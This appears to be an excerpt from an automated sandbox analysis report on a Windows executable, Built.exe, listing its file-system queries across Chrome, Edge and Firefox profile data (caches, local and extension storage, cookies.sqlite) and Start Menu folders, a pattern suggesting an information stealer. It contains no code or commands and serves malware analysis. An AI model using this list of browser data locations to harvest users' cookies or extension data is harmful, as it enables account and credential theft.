Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation	Jump to behavior
